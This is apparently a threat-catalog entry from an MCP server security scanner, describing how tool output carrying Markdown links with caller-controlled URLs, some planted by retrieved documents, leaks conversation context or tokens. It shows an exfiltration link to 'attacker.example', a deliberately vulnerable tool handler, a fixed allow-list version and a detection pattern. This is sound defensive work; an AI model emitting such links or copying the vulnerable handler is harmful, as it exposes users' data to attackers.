Interaction & Data Flow
Concrete carrier for the exfil-via-tool-output family (parent: MCP-005, sibling: MCP-220 image variant): an MCP tool returns Markdown hyperlinks where the URL is built from caller-controlled input — clicking the rendered link sends conversation context (or session tokens) to the attacker's domain.
Sibling of MCP-220, but with explicit user interaction: instead of an auto-fetched image, the bug surface is `[text](attacker.example/log?data=...)`. The user has to click the link, but the link's display text can be anything ("Read more", "Source documentation") — and many users click without scrutinizing the destination.
Malicious documents retrieved by an MCP tool can plant hyperlinks that propagate through the model's reasoning into the tool's reply. The tool then hands them back to the client unchanged, and the client renders them as clickable links. The attack works without any prompt-injection sophistication — the tool just has to forward URLs.
@server.tool() |
def search_docs(query: str, source_url: str) -> str: |
# source_url comes from retrieved content — attacker-controllable. |
return f"Found result. [Read source]({source_url})" |
from urllib.parse import urlparse |
ALLOWED = {"docs.your-app.example", "github.com"} |
@server.tool() |
def search_docs(query: str, source_url: str) -> str: |
host = urlparse(source_url).hostname or "" |
if host not in ALLOWED: |
return "Found result. (Source URL hidden — domain not allow-listed.)" |
return f"Found result. [Read source]({source_url})" |
Pattern matches `[<text>](<url>)` Markdown construction in tool returns where the URL component is f-string / `.format()` / `+` concatenated from a handler parameter. Allow-listed by `urlparse(...).hostname in ALLOWED`-style guards or explicit domain checks.
See the full threat catalog for every documented detection.
MCPSafe runs this check — and every other rule in the catalog — on any MCP server you paste in.
Scan now